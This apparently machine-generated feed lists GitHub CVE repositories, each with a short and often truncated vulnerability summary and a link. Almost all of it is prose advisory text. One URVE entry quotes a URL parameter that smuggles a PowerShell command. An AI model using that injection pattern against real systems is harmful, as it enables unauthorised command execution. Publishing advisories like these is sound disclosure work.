**A potential vulnerability was reported in Lenovo PCManager prior to version 5.0.10.4191 that may allow code execution when visiting a specially crafted website. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1513](https://github.com/Live-Hack-CVE/CVE-2022-1513) create time: 2022-12-30T02:37:06Z

**Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=user/manage_user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36679](https://github.com/Live-Hack-CVE/CVE-2022-36679) create time: 2022-12-30T02:37:03Z

**Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_category. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36678](https://github.com/Live-Hack-CVE/CVE-2022-36678) create time: 2022-12-30T02:36:59Z

**Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36681](https://github.com/Live-Hack-CVE/CVE-2022-36681) create time: 2022-12-30T02:36:56Z

**Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_schedule. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36680](https://github.com/Live-Hack-CVE/CVE-2022-36680) create time: 2022-12-30T02:36:51Z

**An issue was discovered in Online Diagnostic Lab Management System 1.0. There is a stored XSS vulnerability via firstname, address, middlename, lastname , gender, email, contact parameters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37150](https://github.com/Live-Hack-CVE/CVE-2022-37150) create time: 2022-12-30T02:36:48Z

**Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_payment. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36683](https://github.com/Live-Hack-CVE/CVE-2022-36683) create time: 2022-12-30T02:36:44Z

**Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_student. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36682](https://github.com/Live-Hack-CVE/CVE-2022-36682) create time: 2022-12-30T02:36:40Z

**There is an unauthorized access vulnerability in Online Diagnostic Lab Management System 1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37151](https://github.com/Live-Hack-CVE/CVE-2022-37151) create time: 2022-12-30T02:36:37Z

**An issue was discovered in Online Diagnostic Lab Management System 1.0, There is a SQL injection vulnerability via "dob" parameter in "/classes/Users.php?f=save_client" CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37152](https://github.com/Live-Hack-CVE/CVE-2022-37152) create time: 2022-12-30T02:36:33Z

**Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /categories/view_category.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36698](https://github.com/Live-Hack-CVE/CVE-2022-36698) create time: 2022-12-30T02:36:29Z

**Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /items/manage_item.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36700](https://github.com/Live-Hack-CVE/CVE-2022-36700) create time: 2022-12-30T02:36:26Z

**A flaw was found in StarWind iSCSI target. An attacker could script standard iSCSI Initiator operation(s) to exhaust the StarWind service socket, which could lead to denial of service. This affects iSCSI SAN (Windows Native) Version 3.2.2 build 2007-02-20. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2007-20001](https://github.com/Live-Hack-CVE/CVE-2007-20001) create time: 2022-12-30T00:30:15Z

**Unspecified vulnerability in the Multi Protocol Label Switching (MPLS) Forwarding Infrastructure (MFI) in Cisco IOS 12.2 and 12.4 allows remote attackers to cause a denial of service (memory corruption) via crafted packets for which the software path is used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2008-3804](https://github.com/Live-Hack-CVE/CVE-2008-3804) create time: 2022-12-30T01:15:14Z

**The popen API function in TSRM/tsrm_win32.c in PHP before 5.2.11 and 5.3.x before 5.3.1, when running on certain Windows operating systems, allows context-dependent attackers to cause a denial of service (crash) via a crafted (1) "e" or (2) "er" string in the second argument (aka mode), possibly related to the _fdopen CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-3294](https://github.com/Live-Hack-CVE/CVE-2009-3294) create time: 2022-12-30T00:24:41Z

**smbd in Samba 3.0 before 3.0.37, 3.2 before 3.2.15, 3.3 before 3.3.8, and 3.4 before 3.4.2 allows remote authenticated users to cause a denial of service (infinite loop) via an unanticipated oplock break notification reply packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-2906](https://github.com/Live-Hack-CVE/CVE-2009-2906) create time: 2022-12-30T00:24:17Z

**fopen_wrappers.c in PHP 5.3.x through 5.3.3 might allow remote attackers to bypass open_basedir restrictions via vectors related to the length of a filename. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-3436](https://github.com/Live-Hack-CVE/CVE-2010-3436) create time: 2022-12-30T00:24:45Z

**The winbind_name_list_to_sid_string_list function in nsswitch/pam_winbind.c in Samba through 4.1.2 handles invalid require_membership_of group names by accepting authentication by any user, which allows remote authenticated users to bypass intended access restrictions in opportunistic circumstances by leveraging an adm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-6150](https://github.com/Live-Hack-CVE/CVE-2012-6150) create time: 2022-12-30T00:24:31Z

**A flaw was found in StarWind iSCSI target. StarWind service does not limit client connections and allocates memory on each connection attempt. An attacker could create a denial of service state by trying to connect a non-existent target multiple times. This affects iSCSI SAN (Windows Native) Version 6.0, build 2013-01- CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-20004](https://github.com/Live-Hack-CVE/CVE-2013-20004) create time: 2022-12-30T00:30:18Z

**Samba 3.2.x through 3.6.x before 3.6.20, 4.0.x before 4.0.11, and 4.1.x before 4.1.1, when vfs_streams_depot or vfs_streams_xattr is enabled, allows remote attackers to bypass intended file restrictions by leveraging ACL differences between a file and an associated alternate data stream (ADS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-4475](https://github.com/Live-Hack-CVE/CVE-2013-4475) create time: 2022-12-30T00:24:34Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.72 and earlier, 5.5.34 and earlier, and 5.6.14 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0412](https://github.com/Live-Hack-CVE/CVE-2014-0412) create time: 2022-12-30T01:16:12Z

**Samba 3.6.6 through 3.6.23, 4.0.x before 4.0.18, and 4.1.x before 4.1.8, when a certain vfs shadow copy configuration is enabled, does not properly initialize the SRV_SNAPSHOT_ARRAY response field, which allows remote authenticated users to obtain potentially sensitive information from process memory via a (1) FSCTL_GE CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0178](https://github.com/Live-Hack-CVE/CVE-2014-0178) create time: 2022-12-30T00:24:38Z

**In ip_check_mc_rcu of igmp.c, there is a possible use after free due to improper locking. This could lead to local escalation of privilege when opening and closing inet sockets with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20141](https://github.com/Live-Hack-CVE/CVE-2022-20141) create time: 2022-12-30T00:22:58Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.40 and earlier allows remote authenticated users to affect availability via vectors related to Server : InnoDB : DDL : Foreign Key. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0432](https://github.com/Live-Hack-CVE/CVE-2015-0432) create time: 2022-12-30T01:16:09Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.40 and earlier and 5.6.21 and earlier allows remote attackers to affect availability via unknown vectors related to Server : Replication, a different vulnerability than CVE-2015-0382. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0381](https://github.com/Live-Hack-CVE/CVE-2015-0381) create time: 2022-12-30T01:13:18Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.40 and earlier and 5.6.21 and earlier allows remote attackers to affect availability via unknown vectors related to Server : Replication, a different vulnerability than CVE-2015-0381. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0382](https://github.com/Live-Hack-CVE/CVE-2015-0382) create time: 2022-12-30T01:13:14Z

**Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier allows local users to affect availability via vectors related to Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0651](https://github.com/Live-Hack-CVE/CVE-2016-0651) create time: 2022-12-30T01:16:01Z

**Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect integrity and availability via vectors related to Federated. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0642](https://github.com/Live-Hack-CVE/CVE-2016-0642) create time: 2022-12-30T01:15:57Z

**There is a carry propagating bug in the Broadwell-specific Montgomery multiplication procedure in OpenSSL 1.0.2 and 1.1.0 before 1.1.0c that handles input lengths divisible by, but longer than 256 bits. Analysis suggests that attacks against RSA, DSA and DH private keys are impossible. This is because the subroutine in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7055](https://github.com/Live-Hack-CVE/CVE-2016-7055) create time: 2022-12-30T00:24:48Z

**The Remote Keyless Entry (RKE) receiving unit on certain Nissan, Kia, and Hyundai vehicles through 2017 allows remote attackers to perform unlock operations and force a resynchronization after capturing two consecutive valid key fob signals over the radio, aka a RollBack attack. The attacker retains the ability to unlo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37418](https://github.com/Live-Hack-CVE/CVE-2022-37418) create time: 2022-12-30T01:07:23Z

**An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A SIGSEGV occurs in left_adjust_char_head() during regular expression compilation. Invalid handling of reg->dmax in forward_search_range() could result in an invalid pointer dereference, normall CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-9229](https://github.com/Live-Hack-CVE/CVE-2017-9229) create time: 2022-12-30T00:25:15Z

**Node.js had a bug in versions 8.X and 9.X which caused buffers to not be initialized when the encoding for the fill value did not match the encoding specified. For example, 'Buffer.alloc(0x100, "This is not correctly encoded", "hex");' The buffer implementation was updated such that the buffer will be initialized to al CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-15897](https://github.com/Live-Hack-CVE/CVE-2017-15897) create time: 2022-12-30T00:24:51Z

**The Remote Keyless Entry (RKE) receiving unit on certain Honda vehicles through 2018 allows remote attackers to perform unlock operations and force a resynchronization after capturing five consecutive valid RKE signals over the radio, aka a RollBack attack. The attacker retains the ability to unlock indefinitely. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37305](https://github.com/Live-Hack-CVE/CVE-2022-37305) create time: 2022-12-30T01:07:28Z

**IBM DataPower Gateway V10CD, 10.0.1, and 2018.4.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 228357. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31773](https://github.com/Live-Hack-CVE/CVE-2022-31773) create time: 2022-12-30T01:06:35Z

**All versions of Samba from 4.0.0 onwards are vulnerable to a denial of service attack when the RPC spoolss service is configured to be run as an external daemon. Missing input sanitization checks on some of the input parameters to spoolss RPC calls could cause the print spooler service to crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1050](https://github.com/Live-Hack-CVE/CVE-2018-1050) create time: 2022-12-30T00:24:20Z

**res_pjsip_t38 in Sangoma Asterisk 15.x before 15.7.4 and 16.x before 16.5.1 allows an attacker to trigger a crash by sending a declined stream in a response to a T.38 re-invite initiated by Asterisk. The crash occurs because of a NULL session media object dereference. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15297](https://github.com/Live-Hack-CVE/CVE-2019-15297) create time: 2022-12-30T01:15:03Z

**In Vim before 8.1.0881, users can circumvent the rvim restricted mode and execute arbitrary OS commands via scripting interfaces (e.g., Python, Ruby, or Lua). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20807](https://github.com/Live-Hack-CVE/CVE-2019-20807) create time: 2022-12-30T00:26:26Z

**The VRRP parser in tcpdump before 4.9.3 has a buffer over-read in print-vrrp.c:vrrp_print() for VRRP version 3, a different vulnerability than CVE-2018-14463. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15167](https://github.com/Live-Hack-CVE/CVE-2019-15167) create time: 2022-12-29T23:52:19Z

**The refactoring present in Apache Tomcat 9.0.28 to 9.0.30, 8.5.48 to 8.5.50 and 7.0.98 to 7.0.99 introduced a regression. The result of the regression was that invalid Transfer-Encoding headers were incorrectly processed leading to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy tha CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17569](https://github.com/Live-Hack-CVE/CVE-2019-17569) create time: 2022-12-29T23:45:28Z

**net-snmp before 5.8.1.pre1 has a double free in usm_free_usmStateReference in snmplib/snmpusm.c via an SNMPv3 GetBulk request. NOTE: this affects net-snmp packages shipped to end users by multiple Linux distributions, but might not affect an upstream release. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20892](https://github.com/Live-Hack-CVE/CVE-2019-20892) create time: 2022-12-29T23:44:37Z

**The lzo1x_decompress function in liblzo2.so.2 in LZO 2.10, as used in Long Range Zip (aka lrzip) 0.631, allows remote attackers to cause a denial of service (invalid memory read and application crash) via a crafted archive, a different vulnerability than CVE-2017-8845. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10654](https://github.com/Live-Hack-CVE/CVE-2019-10654) create time: 2022-12-29T23:40:41Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.6.47 and prior, 5.7.28 and prior and 8.0.18 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Success CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2814](https://github.com/Live-Hack-CVE/CVE-2020-2814) create time: 2022-12-30T01:15:54Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MyS CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2812](https://github.com/Live-Hack-CVE/CVE-2020-2812) create time: 2022-12-30T01:15:50Z

**Affected versions of Atlassian Confluence Server and Data Center allow remote attackers to impact the application's availability via a Denial of Service (DoS) vulnerability in the avatar upload feature. The affected versions are before version 7.2.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-29450](https://github.com/Live-Hack-CVE/CVE-2020-29450) create time: 2022-12-30T01:08:55Z

**The Remote Keyless Entry (RKE) receiving unit on certain Mazda vehicles through 2020 allows remote attackers to perform unlock operations and force a resynchronization after capturing three consecutive valid key-fob signals over the radio, aka a RollBack attack. The attacker retains the ability to unlock indefinitely. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36945](https://github.com/Live-Hack-CVE/CVE-2022-36945) create time: 2022-12-30T01:07:31Z

**An out-of-bounds write vulnerability exists in the Obj.cpp load_obj() functionality of Prusa Research PrusaSlicer 2.2.0 and Master (commit 4b040b856). A specially crafted obj file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28595](https://github.com/Live-Hack-CVE/CVE-2020-28595) create time: 2022-12-30T01:05:47Z

**A stack-based buffer overflow vulnerability exists in the Objparser::objparse() functionality of Prusa Research PrusaSlicer 2.2.0 and Master (commit 4b040b856). A specially crafted obj file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28596](https://github.com/Live-Hack-CVE/CVE-2020-28596) create time: 2022-12-30T01:05:44Z

**An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll PNG pngread parser of the Accusoft ImageGear 19.5.0 library. A specially crafted PNG file can cause an out-of-bounds write, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6068](https://github.com/Live-Hack-CVE/CVE-2020-6068) create time: 2022-12-30T01:05:40Z

**An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll TIFF tifread parser of the Accusoft ImageGear 19.5.0 library. A specially crafted TIFF file can cause an out-of-bounds write, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vuln CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6067](https://github.com/Live-Hack-CVE/CVE-2020-6067) create time: 2022-12-30T01:05:30Z

**An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll JPEG jpegread precision parser of the Accusoft ImageGear 19.5.0 library. A specially crafted JPEG file can cause an out-of-bounds write, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigg CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6069](https://github.com/Live-Hack-CVE/CVE-2020-6069) create time: 2022-12-30T01:05:26Z

**An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll JPEG SOFx parser of the Accusoft ImageGear 19.5.0 library. A specially crafted JPEG file can cause an out-of-bounds write, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnera CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6066](https://github.com/Live-Hack-CVE/CVE-2020-6066) create time: 2022-12-30T01:05:22Z

**An out-of-bounds read vulnerability exists in the AMF File AMFParserContext::endElement() functionality of Slic3r libslic3r 1.3.0 and Master Commit 92abbc42. A specially crafted AMF file can lead to information disclosure. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28591](https://github.com/Live-Hack-CVE/CVE-2020-28591) create time: 2022-12-30T01:04:38Z

**A unauthenticated backdoor exists in the configuration server functionality of Cosori Smart 5.8-Quart Air Fryer CS158-AF 1.1.0. A specially crafted JSON object can lead to code execution. An attacker can send a malicious packet to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28593](https://github.com/Live-Hack-CVE/CVE-2020-28593) create time: 2022-12-30T00:34:07Z

**An exploitable denial of service vulnerability exists in the ENIP Request Path Network Segment functionality of Allen-Bradley Flex IO 1794-AENT/B 4.003. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigg CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6088](https://github.com/Live-Hack-CVE/CVE-2020-6088) create time: 2022-12-30T00:34:00Z

**A use-after-free vulnerability was found in the am53c974 SCSI host bus adapter emulation of QEMU in versions before 6.0.0 during the handling of the 'Information Transfer' command (CMD_TI). This flaw allows a privileged guest user to crash the QEMU process on the host, resulting in a denial of service or potential code CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35506](https://github.com/Live-Hack-CVE/CVE-2020-35506) create time: 2022-12-30T00:33:57Z

**A use-after-free vulnerability exists in the _3MF_Importer::_handle_end_model() functionality of Prusa Research PrusaSlicer 2.2.0 and Master (commit 4b040b856). A specially crafted 3MF file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28594](https://github.com/Live-Hack-CVE/CVE-2020-28594) create time: 2022-12-30T00:33:53Z

**An improper array index validation vulnerability exists in the LoadObj functionality of tinyobjloader v2.0-rc1 and tinyobjloader development commit 79d4421. A specially crafted file could lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28589](https://github.com/Live-Hack-CVE/CVE-2020-28589) create time: 2022-12-30T00:33:50Z

**A null pointer dereference flaw was found in samba's Winbind service in versions before 4.11.15, before 4.12.9 and before 4.13.1. A local user could use this flaw to crash the winbind service causing denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14323](https://github.com/Live-Hack-CVE/CVE-2020-14323) create time: 2022-12-30T00:24:27Z

**Zaver through 2020-12-15 allows directory traversal via the GET /.. substring. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38794](https://github.com/Live-Hack-CVE/CVE-2022-38794) create time: 2022-12-29T23:52:08Z

**The Graphics Protocol feature in graphics.c in kitty before 0.19.3 allows remote attackers to execute arbitrary code because a filename containing special characters can be included in an error message. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35605](https://github.com/Live-Hack-CVE/CVE-2020-35605) create time: 2022-12-29T23:52:01Z

**An issue was discovered in URVE Build 24.03.2020. By using the _internal/pc/vpro.php?mac=0&ip=0&operation=0&usr=0&pass=0%3bpowershell+-c+" substring, it is possible to execute a Powershell command and redirect its output to a file under the web root. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-29552](https://github.com/Live-Hack-CVE/CVE-2020-29552) create time: 2022-12-29T23:49:09Z

**An issue was discovered in URVE Build 24.03.2020. The password of an integration user account (used for the connection of the MS Office 365 Integration Service) is stored in cleartext in configuration files as well as in the database. The following files contain the password in cleartext: Profiles/urve/files/sql_db.bac CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-29550](https://github.com/Live-Hack-CVE/CVE-2020-29550) create time: 2022-12-29T23:49:05Z

**smtpd/lka_filter.c in OpenSMTPD before 6.8.0p1, in certain configurations, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted pattern of client activity, because the filter state machine does not properly maintain the I/O channel between the SMTP engine and th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35680](https://github.com/Live-Hack-CVE/CVE-2020-35680) create time: 2022-12-29T23:49:02Z

**FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35728](https://github.com/Live-Hack-CVE/CVE-2020-35728) create time: 2022-12-29T23:46:09Z

**FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36181](https://github.com/Live-Hack-CVE/CVE-2020-36181) create time: 2022-12-29T23:46:05Z

**FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36183](https://github.com/Live-Hack-CVE/CVE-2020-36183) create time: 2022-12-29T23:45:58Z

**FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36182](https://github.com/Live-Hack-CVE/CVE-2020-36182) create time: 2022-12-29T23:45:54Z

**FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36184](https://github.com/Live-Hack-CVE/CVE-2020-36184) create time: 2022-12-29T23:45:51Z

**FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36185](https://github.com/Live-Hack-CVE/CVE-2020-36185) create time: 2022-12-29T23:45:47Z

**FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36186](https://github.com/Live-Hack-CVE/CVE-2020-36186) create time: 2022-12-29T23:45:44Z

**FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36187](https://github.com/Live-Hack-CVE/CVE-2020-36187) create time: 2022-12-29T23:45:40Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 5.7.33 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2154](https://github.com/Live-Hack-CVE/CVE-2021-2154) create time: 2022-12-30T01:15:32Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.33 and prior and 8.0.23 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of thi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2194](https://github.com/Live-Hack-CVE/CVE-2021-2194) create time: 2022-12-30T01:15:28Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.33 and prior and 8.0.23 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of thi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2180](https://github.com/Live-Hack-CVE/CVE-2021-2180) create time: 2022-12-30T01:15:25Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 5.7.33 and prior and 8.0.23 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-2166](https://github.com/Live-Hack-CVE/CVE-2021-2166) create time: 2022-12-30T01:15:21Z

**The Protect WP Admin WordPress plugin before 3.6.2 does not check for authorisation in the lib/pwa-deactivate.php file, which could allow unauthenticated users to disable the plugin (and therefore the protection offered) via a crafted request CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24906](https://github.com/Live-Hack-CVE/CVE-2021-24906) create time: 2022-12-30T01:15:18Z

**The Stars Rating WordPress plugin before 3.5.1 does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service in the comments section, or pending comment dashboard depending if the user sent it as unauthenticated or authenticated. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24893](https://github.com/Live-Hack-CVE/CVE-2021-24893) create time: 2022-12-30T01:14:22Z

**The Formidable Form Builder WordPress plugin before 4.09.05 allows to inject certain HTML Tags like ,,, and.This could allow an unauthenticated, remote attacker to exploit a HTML-injection byinjecting a malicous link. The HTML-injection may trick authenticated users to follow the link. If CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24884](https://github.com/Live-Hack-CVE/CVE-2021-24884) create time: 2022-12-30T01:14:18Z

**The Insert Pages WordPress plugin before 3.7.0 allows users with a role as low as Contributor to access content and metadata from arbitrary posts/pages regardless of their author and status (ie private), using a shortcode. Password protected posts/pages are not affected by such issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24851](https://github.com/Live-Hack-CVE/CVE-2021-24851) create time: 2022-12-30T01:14:15Z

**The SupportCandy WordPress plugin before 2.2.5 does not have authorisation and CSRF checks in its wpsc_tickets AJAX action, which could allow unauthenticated users to call it and delete arbitrary tickets via the set_delete_permanently_bulk_ticket setting_action. Other actions may be affected as well. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24839](https://github.com/Live-Hack-CVE/CVE-2021-24839) create time: 2022-12-30T01:14:11Z

**Cleartext Storage of Sensitive Information in Memory vulnerability in Gallagher Command Centre Server allows Cloud end-to-end encryption key to be discoverable in server memory dumps. This issue affects: Gallagher Command Centre 8.40 versions prior to 8.40.1888 (MR3). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23211](https://github.com/Live-Hack-CVE/CVE-2021-23211) create time: 2022-12-30T01:14:08Z

**An attacker with physical access to the host can extract the secrets from the registry and create valid JWT tokens for the Fresenius Kabi Vigilant MasterMed version 2.0.1.3 application and impersonate arbitrary users. An attacker could manipulate RabbitMQ queues and messages by impersonating users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23207](https://github.com/Live-Hack-CVE/CVE-2021-23207) create time: 2022-12-30T01:14:04Z

**The user and password data base is exposed by an unprotected web server resource. Passwords are hashed with a weak hashing algorithm and therefore allow an attacker to determine the password by using rainbow tables. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23855](https://github.com/Live-Hack-CVE/CVE-2021-23855) create time: 2022-12-30T01:14:01Z

**Unauthenticated remote attackers can read textual content via FreeMarker including files /scripts/*, /templates/* and some of the files in /.git/* (non-binary). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23263](https://github.com/Live-Hack-CVE/CVE-2021-23263) create time: 2022-12-30T01:13:57Z

